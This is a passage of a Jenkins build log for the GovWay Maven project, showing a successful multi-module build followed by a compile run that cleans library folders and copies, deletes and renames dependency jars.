dependencies.testsuite.as.tomcat11 ................. SUCCESS [ 7.219 s] 17:46:51 [INFO] dependencies.testsuite.test ........................ SUCCESS [ 7.609 s] 17:46:51 [INFO] dependencies.testsuite.test.testng ................. SUCCESS [ 7.070 s] 17:46:51 [INFO] dependencies.testsuite.test.junit4 ................. SUCCESS [ 7.626 s] 17:46:51 [INFO] dependencies.testsuite.test.karate09 ............... SUCCESS [ 7.331 s] 17:46:51 [INFO] dependencies.testsuite.test.logback ................ SUCCESS [ 7.274 s] 17:46:51 [INFO] dependencies.testsuite.test.httpcore4 .............. SUCCESS [ 7.209 s] 17:46:51 [INFO] dependencies.testsuite.test.spring5 ................ SUCCESS [ 6.773 s] 17:46:51 [INFO] dependencies.testsuite.test.spring-ldap2 ........... SUCCESS [ 7.189 s] 17:46:51 [INFO] dependencies.testsuite.test.apacheds ............... SUCCESS [ 7.409 s] 17:46:51 [INFO] dependencies.testsuite.test.cxf3 ................... SUCCESS [ 7.963 s] 17:46:51 [INFO] dependencies.testsuite.staticAnalysis .............. SUCCESS [ 7.949 s] 17:46:51 [INFO] dependencies.testsuite.dynamicAnalysis ............. SUCCESS [ 8.623 s] 17:46:51 [INFO] dependencies.testsuite.coverage .................... SUCCESS [ 9.086 s] 17:46:51 [INFO] compile ............................................ SUCCESS [ 0.008 s] 17:46:51 [INFO] package ............................................ SUCCESS [ 0.001 s] 17:46:51 [INFO] testsuite.utils .................................... SUCCESS [ 0.000 s] 17:46:51 [INFO] testsuite.utils.sql ................................ SUCCESS [ 0.001 s] 17:46:51 [INFO] testsuite.pdd.core ................................. SUCCESS [ 0.000 s] 17:46:51 [INFO] testsuite.pdd.core.sql ............................. SUCCESS [ 0.000 s] 17:46:51 [INFO] static_analysis.spotbugs ........................... SUCCESS [ 0.000 s] 17:46:51 [INFO] static_analysis.sonarqube .......................... SUCCESS [ 0.000 s] 17:46:51 [INFO] dynamic_analysis.zap ............................... SUCCESS [ 0.001 s] 17:46:51 [INFO] coverage.jacoco .................................... SUCCESS [ 0.000 s] 17:46:51 [INFO] ------------------------------------------------------------------------ 17:46:51 [INFO] BUILD SUCCESS 17:46:51 [INFO] ------------------------------------------------------------------------ 17:46:51 [INFO] Total time: 09:21 min 17:46:51 [INFO] Finished at: 2026-04-07T17:46:51+02:00 17:46:51 [INFO] ------------------------------------------------------------------------ 17:46:51 [GovWay] $ /bin/bash /tmp/jenkins12050538873993338166.sh 17:46:51 Pubblicazione risultati dependency check ... 17:46:52 cp: cannot create directory ‘/opt/apache-tomcat-11.0.8/webapps/dependency-check/result’: No such file or directory 17:46:52 Pubblicazione risultati dependency check effettuata 17:46:52 Pubblicazione installer su risultati testsuite ... 17:46:52 Pubblicazione installer su risultati testsuite effettuata 17:46:52 [GovWay] $ /opt/apache-maven-3.9.10/bin/mvn -Dpackage=none -Dcompile=compile -Dowasp=none -Dtestsuite=none compile 17:46:59 [INFO] Scanning for projects... 17:47:01 [INFO] ------------------------------------------------------------------------ 17:47:01 [INFO] Reactor Build Order: 17:47:01 [INFO] 17:47:01 [INFO] govway [pom] 17:47:01 [INFO] dependencies [pom] 17:47:01 [INFO] dependencies.ant [pom] 17:47:01 [INFO] dependencies.antinstaller [pom] 17:47:01 [INFO] dependencies.angus [pom] 17:47:01 [INFO] dependencies.bean-validation [pom] 17:47:01 [INFO] dependencies.cxf [pom] 17:47:01 [INFO] dependencies.commons [pom] 17:47:01 [INFO] dependencies.console [pom] 17:47:01 [INFO] dependencies.git [pom] 17:47:01 [INFO] dependencies.httpcore [pom] 17:47:01 [INFO] dependencies.jackson [pom] 17:47:01 [INFO] dependencies.jakarta [pom] 17:47:01 [INFO] dependencies.jaxb [pom] 17:47:01 [INFO] dependencies.jetty [pom] 17:47:01 [INFO] dependencies.jmx [pom] 17:47:01 [INFO] dependencies.json [pom] 17:47:01 [INFO] dependencies.log [pom] 17:47:01 [INFO] dependencies.lucene [pom] 17:47:01 [INFO] dependencies.openapi4j [pom] 17:47:01 [INFO] dependencies.opensaml [pom] 17:47:01 [INFO] dependencies.pdf [pom] 17:47:01 [INFO] dependencies.redis [pom] 17:47:01 [INFO] dependencies.reports [pom] 17:47:01 [INFO] dependencies.saaj [pom] 17:47:01 [INFO] dependencies.security [pom] 17:47:01 [INFO] dependencies.shared [pom] 17:47:01 [INFO] dependencies.spring [pom] 17:47:01 [INFO] dependencies.spring-ldap [pom] 17:47:01 [INFO] dependencies.spring-security [pom] 17:47:01 [INFO] dependencies.swagger [pom] 17:47:01 [INFO] dependencies.wss4j [pom] 17:47:01 [INFO] dependencies.testsuite [pom] 17:47:01 [INFO] dependencies.testsuite.axis14 [pom] 17:47:01 [INFO] dependencies.testsuite.as [pom] 17:47:01 [INFO] dependencies.testsuite.as.wildfly27 [pom] 17:47:01 [INFO] dependencies.testsuite.as.wildfly28 [pom] 17:47:01 [INFO] dependencies.testsuite.as.wildfly35 [pom] 17:47:01 [INFO] dependencies.testsuite.as.wildfly36 [pom] 17:47:01 [INFO] dependencies.testsuite.as.wildfly37 [pom] 17:47:01 [INFO] dependencies.testsuite.as.wildfly38 [pom] 17:47:01 [INFO] dependencies.testsuite.as.wildfly39 [pom] 17:47:01 [INFO] dependencies.testsuite.as.tomcat10 [pom] 17:47:01 [INFO] dependencies.testsuite.as.tomcat11 [pom] 17:47:01 [INFO] dependencies.testsuite.test [pom] 17:47:01 [INFO] dependencies.testsuite.test.testng [pom] 17:47:01 [INFO] dependencies.testsuite.test.junit4 [pom] 17:47:01 [INFO] dependencies.testsuite.test.karate09 [pom] 17:47:01 [INFO] dependencies.testsuite.test.logback [pom] 17:47:01 [INFO] dependencies.testsuite.test.httpcore4 [pom] 17:47:01 [INFO] dependencies.testsuite.test.spring5 [pom] 17:47:01 [INFO] dependencies.testsuite.test.spring-ldap2 [pom] 17:47:01 [INFO] dependencies.testsuite.test.apacheds [pom] 17:47:01 [INFO] dependencies.testsuite.test.cxf3 [pom] 17:47:01 [INFO] dependencies.testsuite.staticAnalysis [pom] 17:47:01 [INFO] dependencies.testsuite.dynamicAnalysis [pom] 17:47:01 [INFO] dependencies.testsuite.coverage [pom] 17:47:01 [INFO] compile [pom] 17:47:01 [INFO] package [pom] 17:47:01 [INFO] testsuite.utils [pom] 17:47:01 [INFO] testsuite.utils.sql [pom] 17:47:01 [INFO] testsuite.pdd.core [pom] 17:47:01 [INFO] testsuite.pdd.core.sql [pom] 17:47:01 [INFO] static_analysis.spotbugs [pom] 17:47:01 [INFO] static_analysis.sonarqube [pom] 17:47:01 [INFO] dynamic_analysis.zap [pom] 17:47:01 [INFO] coverage.jacoco [pom] 17:47:01 [INFO] 17:47:01 [INFO] ------------------< org.openspcoop2:org.openspcoop2 >------------------- 17:47:01 [INFO] Building govway 1.0 [1/67] 17:47:01 [INFO] from pom.xml 17:47:01 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:01 [INFO] 17:47:01 [INFO] ------------< org.openspcoop2:org.openspcoop2.dependencies >------------ 17:47:01 [INFO] Building dependencies 1.0 [2/67] 17:47:01 [INFO] from mvn/dependencies/pom.xml 17:47:01 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:01 [INFO] 17:47:01 [INFO] ----------------< org.openspcoop2:org.openspcoop2.ant >----------------- 17:47:01 [INFO] Building dependencies.ant 1.0 [3/67] 17:47:01 [INFO] from mvn/dependencies/ant/pom.xml 17:47:01 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:01 [INFO] 17:47:01 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.ant --- 17:47:02 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/ant (includes = [*.jar], excludes = []) 17:47:02 [INFO] 17:47:02 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.ant --- 17:47:05 [INFO] 17:47:05 [INFO] ------------< org.openspcoop2:org.openspcoop2.antinstaller >------------ 17:47:05 [INFO] Building dependencies.antinstaller 1.0 [4/67] 17:47:05 [INFO] from mvn/dependencies/antinstaller/pom.xml 17:47:05 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:05 [INFO] 17:47:05 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.antinstaller --- 17:47:05 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/antinstaller (includes = [*.jar], excludes = []) 17:47:05 [INFO] 17:47:05 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.antinstaller --- 17:47:05 [INFO] 17:47:05 [INFO] ---------------< org.openspcoop2:org.openspcoop2.angus >---------------- 17:47:05 [INFO] Building dependencies.angus 1.0 [5/67] 17:47:05 [INFO] from mvn/dependencies/angus/pom.xml 17:47:05 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:05 [INFO] 17:47:05 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.angus --- 17:47:05 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/angus (includes = [*.jar], excludes = []) 17:47:05 [INFO] 17:47:05 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.angus --- 17:47:05 [INFO] 17:47:05 [INFO] ----------< org.openspcoop2:org.openspcoop2.bean-validation >----------- 17:47:05 [INFO] Building dependencies.bean-validation 1.0 [6/67] 17:47:05 [INFO] from mvn/dependencies/bean-validation/pom.xml 17:47:05 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:05 [INFO] 17:47:05 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.bean-validation --- 17:47:05 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/bean-validation (includes = [*.jar], excludes = []) 17:47:05 [INFO] 17:47:05 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.bean-validation --- 17:47:05 [INFO] 17:47:05 [INFO] ----------------< org.openspcoop2:org.openspcoop2.cxf >----------------- 17:47:05 [INFO] Building dependencies.cxf 1.0 [7/67] 17:47:05 [INFO] from mvn/dependencies/cxf/pom.xml 17:47:05 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:06 [INFO] 17:47:06 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.cxf --- 17:47:06 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/cxf (includes = [*.jar], excludes = []) 17:47:06 [INFO] 17:47:06 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.cxf --- 17:47:06 [INFO] 17:47:06 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.cxf --- 17:47:07 [INFO] Executing tasks 17:47:07 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/cxf/cxf-core-4.1.3.jar 17:47:07 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/cxf/cxf-rt-rs-security-jose-4.1.3.jar 17:47:07 [INFO] Executed tasks 17:47:07 [INFO] 17:47:07 [INFO] --------------< org.openspcoop2:org.openspcoop2.commons >--------------- 17:47:07 [INFO] Building dependencies.commons 1.0 [8/67] 17:47:07 [INFO] from mvn/dependencies/commons/pom.xml 17:47:07 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:08 [INFO] 17:47:08 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.commons --- 17:47:08 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/commons (includes = [*.jar], excludes = []) 17:47:08 [INFO] 17:47:08 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.commons --- 17:47:08 [INFO] 17:47:08 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.commons --- 17:47:08 [INFO] Executing tasks 17:47:08 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/commons/commons-jcs3-core-3.2.1.jar 17:47:08 [INFO] Executed tasks 17:47:08 [INFO] 17:47:08 [INFO] --------------< org.openspcoop2:org.openspcoop2.console >--------------- 17:47:08 [INFO] Building dependencies.console 1.0 [9/67] 17:47:08 [INFO] from mvn/dependencies/console/pom.xml 17:47:08 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:08 [INFO] 17:47:08 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.console --- 17:47:08 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/console (includes = [*.jar], excludes = []) 17:47:08 [INFO] 17:47:08 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.console --- 17:47:08 [INFO] 17:47:08 [INFO] ----------------< org.openspcoop2:org.openspcoop2.git >----------------- 17:47:08 [INFO] Building dependencies.git 1.0 [10/67] 17:47:08 [INFO] from mvn/dependencies/git/pom.xml 17:47:08 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:09 [INFO] 17:47:09 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.git --- 17:47:09 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/git (includes = [*.jar], excludes = []) 17:47:09 [INFO] 17:47:09 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.git --- 17:47:09 [INFO] 17:47:09 [INFO] --------------< org.openspcoop2:org.openspcoop2.httpcore >-------------- 17:47:09 [INFO] Building dependencies.httpcore 1.0 [11/67] 17:47:09 [INFO] from mvn/dependencies/httpcore/pom.xml 17:47:09 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:09 [INFO] 17:47:09 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.httpcore --- 17:47:09 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/httpcore (includes = [*.jar], excludes = []) 17:47:09 [INFO] 17:47:09 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.httpcore --- 17:47:09 [INFO] 17:47:09 [INFO] --------------< org.openspcoop2:org.openspcoop2.jackson >--------------- 17:47:09 [INFO] Building dependencies.jackson 1.0 [12/67] 17:47:09 [INFO] from mvn/dependencies/jackson/pom.xml 17:47:09 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:09 [INFO] 17:47:09 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jackson --- 17:47:09 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jackson (includes = [*.jar], excludes = []) 17:47:09 [INFO] 17:47:09 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jackson --- 17:47:09 [INFO] 17:47:09 [INFO] --------------< org.openspcoop2:org.openspcoop2.jakarta >--------------- 17:47:09 [INFO] Building dependencies.jakarta 1.0 [13/67] 17:47:09 [INFO] from mvn/dependencies/jakarta/pom.xml 17:47:09 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:09 [INFO] 17:47:09 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jakarta --- 17:47:09 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jakarta (includes = [*.jar], excludes = []) 17:47:09 [INFO] 17:47:09 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jakarta --- 17:47:09 [INFO] 17:47:09 [INFO] ----------------< org.openspcoop2:org.openspcoop2.jaxb >---------------- 17:47:09 [INFO] Building dependencies.jaxb 1.0 [14/67] 17:47:09 [INFO] from mvn/dependencies/jaxb/pom.xml 17:47:09 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:09 [INFO] 17:47:09 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jaxb --- 17:47:09 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jaxb (includes = [*.jar], excludes = []) 17:47:09 [INFO] 17:47:09 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jaxb --- 17:47:09 [INFO] 17:47:09 [INFO] ---------------< org.openspcoop2:org.openspcoop2.jetty >---------------- 17:47:09 [INFO] Building dependencies.jetty 1.0 [15/67] 17:47:09 [INFO] from mvn/dependencies/jetty/pom.xml 17:47:09 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:10 [INFO] 17:47:10 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jetty --- 17:47:10 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jetty (includes = [*.jar], excludes = []) 17:47:10 [INFO] 17:47:10 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jetty --- 17:47:10 [INFO] 17:47:10 [INFO] ----------------< org.openspcoop2:org.openspcoop2.jmx >----------------- 17:47:10 [INFO] Building dependencies.jmx 1.0 [16/67] 17:47:10 [INFO] from mvn/dependencies/jmx/pom.xml 17:47:10 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:10 [INFO] 17:47:10 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jmx --- 17:47:10 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jmx (includes = [*.jar], excludes = []) 17:47:10 [INFO] 17:47:10 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jmx --- 17:47:10 [INFO] 17:47:10 [INFO] ----------------< org.openspcoop2:org.openspcoop2.json >---------------- 17:47:10 [INFO] Building dependencies.json 1.0 [17/67] 17:47:10 [INFO] from mvn/dependencies/json/pom.xml 17:47:10 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:10 [INFO] 17:47:10 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.json --- 17:47:10 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/json (includes = [*.jar], excludes = []) 17:47:10 [INFO] 17:47:10 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.json --- 17:47:10 [INFO] 17:47:10 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.json --- 17:47:10 [INFO] Executing tasks 17:47:10 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/json/json-path-2.9.0.jar 17:47:10 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/json/json-schema-validator-2.2.14.jar 17:47:10 [INFO] Executed tasks 17:47:10 [INFO] 17:47:10 [INFO] --- copy-rename:1.0:rename (rename-file-networknt) @ org.openspcoop2.json --- 17:47:11 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/json-schema-validator-1.5.7.jar to /var/lib/jenkins/workspace/GovWay/lib/json/networknt_json-schema-validator-1.5.7.jar 17:47:11 [INFO] 17:47:11 [INFO] --- copy-rename:1.0:rename (rename-file-github-validator) @ org.openspcoop2.json --- 17:47:11 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/json-schema-validator-2.2.14-gov4j-1.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_json-schema-validator-2.2.14-gov4j-1.jar 17:47:11 [INFO] 17:47:11 [INFO] --- copy-rename:1.0:rename (rename-file-github-core) @ org.openspcoop2.json --- 17:47:11 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/json-schema-core-1.2.14.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_json-schema-core-1.2.14.jar 17:47:11 [INFO] 17:47:11 [INFO] --- copy-rename:1.0:rename (rename-file-github-jackson) @ org.openspcoop2.json --- 17:47:11 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/jackson-coreutils-2.0.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_jackson-coreutils-2.0.jar 17:47:11 [INFO] 17:47:11 [INFO] --- copy-rename:1.0:rename (rename-file-github-jackson-equivalence) @ org.openspcoop2.json --- 17:47:11 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/jackson-coreutils-equivalence-1.0.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_jackson-coreutils-equivalence-1.0.jar 17:47:11 [INFO] 17:47:11 [INFO] --- copy-rename:1.0:rename (rename-file-github-uri-template) @ org.openspcoop2.json --- 17:47:11 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/uri-template-0.10.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_uri-template-0.10.jar 17:47:11 [INFO] 17:47:11 [INFO] ----------------< org.openspcoop2:org.openspcoop2.log >----------------- 17:47:11 [INFO] Building dependencies.log 1.0 [18/67] 17:47:11 [INFO] from mvn/dependencies/log/pom.xml 17:47:11 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:11 [INFO] 17:47:11 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.log --- 17:47:11 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/log (includes = [*.jar], excludes = []) 17:47:11 [INFO] 17:47:11 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.log --- 17:47:11 [INFO] 17:47:11 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.log --- 17:47:11 [INFO] Executing tasks 17:47:11 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/log/slf4j-api-2.0.17.jar 17:47:11 [INFO] Executed tasks 17:47:11 [INFO] 17:47:11 [INFO] ---------------< org.openspcoop2:org.openspcoop2.lucene >--------------- 17:47:11 [INFO] Building dependencies.lucene 1.0 [19/67] 17:47:11 [INFO] from mvn/dependencies/lucene/pom.xml 17:47:11 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:11 [INFO] 17:47:11 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.lucene --- 17:47:11 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/lucene (includes = [*.jar], excludes = []) 17:47:11 [INFO] 17:47:11 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.lucene --- 17:47:11 [INFO] 17:47:11 [INFO] -------------< org.openspcoop2:org.openspcoop2.openapi4j >-------------- 17:47:11 [INFO] Building dependencies.openapi4j 1.0 [20/67] 17:47:11 [INFO] from mvn/dependencies/openapi4j/pom.xml 17:47:11 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:11 [INFO] 17:47:11 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.openapi4j --- 17:47:11 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/openapi4j (includes = [*.jar], excludes = []) 17:47:11 [INFO] 17:47:11 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.openapi4j --- 17:47:11 [INFO] 17:47:11 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.openapi4j --- 17:47:11 [INFO] Executing tasks 17:47:11 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/openapi4j/openapi-core-1.0.7.jar 17:47:11 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/openapi4j/openapi-parser-1.0.7.jar 17:47:11 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/openapi4j/openapi-schema-validator-1.0.7.jar 17:47:11 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/openapi4j/openapi-operation-validator-1.0.7.jar 17:47:11 [INFO] Executed tasks 17:47:11 [INFO] 17:47:11 [INFO] --------------< org.openspcoop2:org.openspcoop2.opensaml >-------------- 17:47:11 [INFO] Building dependencies.opensaml 1.0 [21/67] 17:47:11 [INFO] from mvn/dependencies/opensaml/pom.xml 17:47:11 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:11 [INFO] 17:47:11 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.opensaml --- 17:47:11 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/opensaml (includes = [*.jar], excludes = []) 17:47:11 [INFO] 17:47:11 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.opensaml --- 17:47:12 [INFO] 17:47:12 [INFO] ----------------< org.openspcoop2:org.openspcoop2.pdf >----------------- 17:47:12 [INFO] Building dependencies.pdf 1.0 [22/67] 17:47:12 [INFO] from mvn/dependencies/pdf/pom.xml 17:47:12 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:12 [INFO] 17:47:12 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.pdf --- 17:47:12 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/pdf (includes = [*.jar], excludes = []) 17:47:12 [INFO] 17:47:12 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.pdf --- 17:47:12 [INFO] 17:47:12 [INFO] ---------------< org.openspcoop2:org.openspcoop2.redis >---------------- 17:47:12 [INFO] Building dependencies.redis 1.0 [23/67] 17:47:12 [INFO] from mvn/dependencies/redis/pom.xml 17:47:12 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:12 [INFO] 17:47:12 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.redis --- 17:47:12 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/redis (includes = [*.jar], excludes = []) 17:47:12 [INFO] 17:47:12 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.redis --- 17:47:12 [INFO] 17:47:12 [INFO] --------------< org.openspcoop2:org.openspcoop2.reports >--------------- 17:47:12 [INFO] Building dependencies.reports 1.0 [24/67] 17:47:12 [INFO] from mvn/dependencies/reports/pom.xml 17:47:12 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:12 [INFO] 17:47:12 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.reports --- 17:47:12 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/reports (includes = [*.jar], excludes = []) 17:47:12 [INFO] 17:47:12 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.reports --- 17:47:12 [INFO] 17:47:12 [INFO] ----------------< org.openspcoop2:org.openspcoop2.saaj >---------------- 17:47:12 [INFO] Building dependencies.saaj 1.0 [25/67] 17:47:12 [INFO] from mvn/dependencies/saaj/pom.xml 17:47:12 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:12 [INFO] 17:47:12 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.saaj --- 17:47:12 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/saaj (includes = [*.jar], excludes = []) 17:47:12 [INFO] 17:47:12 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.saaj --- 17:47:12 [INFO] 17:47:12 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.saaj --- 17:47:12 [INFO] Executing tasks 17:47:12 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/saaj/saaj-impl-3.0.4.jar 17:47:12 [INFO] Executed tasks 17:47:12 [INFO] 17:47:12 [INFO] --------------< org.openspcoop2:org.openspcoop2.security >-------------- 17:47:12 [INFO] Building dependencies.security 1.0 [26/67] 17:47:12 [INFO] from mvn/dependencies/security/pom.xml 17:47:12 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:12 [INFO] 17:47:12 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.security --- 17:47:12 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/security (includes = [*.jar], excludes = []) 17:47:12 [INFO] 17:47:12 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.security --- 17:47:12 [INFO] 17:47:12 [INFO] ---------------< org.openspcoop2:org.openspcoop2.shared >--------------- 17:47:12 [INFO] Building dependencies.shared 1.0 [27/67] 17:47:12 [INFO] from mvn/dependencies/shared/pom.xml 17:47:12 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:13 [INFO] 17:47:13 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.shared --- 17:47:13 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/shared (includes = [*.jar], excludes = []) 17:47:13 [INFO] 17:47:13 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.shared --- 17:47:13 [INFO] 17:47:13 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.shared --- 17:47:13 [INFO] Executing tasks 17:47:13 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/shared/Saxon-HE-12.7.jar 17:47:13 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/shared/snakeyaml-2.4.jar 17:47:13 [INFO] Executed tasks 17:47:13 [INFO] 17:47:13 [INFO] ---------------< org.openspcoop2:org.openspcoop2.spring >--------------- 17:47:13 [INFO] Building dependencies.spring 1.0 [28/67] 17:47:13 [INFO] from mvn/dependencies/spring/pom.xml 17:47:13 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:13 [INFO] 17:47:13 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.spring --- 17:47:13 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/spring (includes = [*.jar], excludes = []) 17:47:13 [INFO] 17:47:13 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.spring --- 17:47:13 [INFO] 17:47:13 [INFO] ------------< org.openspcoop2:org.openspcoop2.spring-ldap >------------- 17:47:13 [INFO] Building dependencies.spring-ldap 1.0 [29/67] 17:47:13 [INFO] from mvn/dependencies/spring-ldap/pom.xml 17:47:13 [INFO] --------------------------------[ pom ]--------------------------------- 17:47:13 [INFO] 17:47:13 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.spring-ldap --- 17:47:13 [INFO] Deleting 